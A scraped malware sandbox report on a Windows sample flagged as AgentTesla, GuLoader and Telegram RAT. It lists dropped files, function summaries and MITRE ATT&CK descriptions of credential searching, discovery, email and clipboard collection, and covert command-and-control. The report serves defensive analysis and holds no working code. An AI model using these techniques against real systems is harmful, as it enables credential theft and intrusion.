Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Aqua_3.bmp

C:\Users\user\AppData\Local\Temp\ConfigXML_ScenarioProfile.dll

C:\Users\user\AppData\Local\Temp\MsMpCom.dll

C:\Users\user\AppData\Local\Temp\Ottawas.bmp

C:\Users\user\AppData\Local\Temp\nsv58DC.tmp\System.dll

C:\Users\user\AppData\Local\Temp\touchpad-disabled-symbolic.svg

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Windows Analysis Report
file.exe

Function 004034F7 Relevance: 81.0, APIs: 33, Strings: 13, Instructions: 450
stringfilecomCOMMON

Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 70AC1BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 033AFAFD Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 490
COMMON

Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre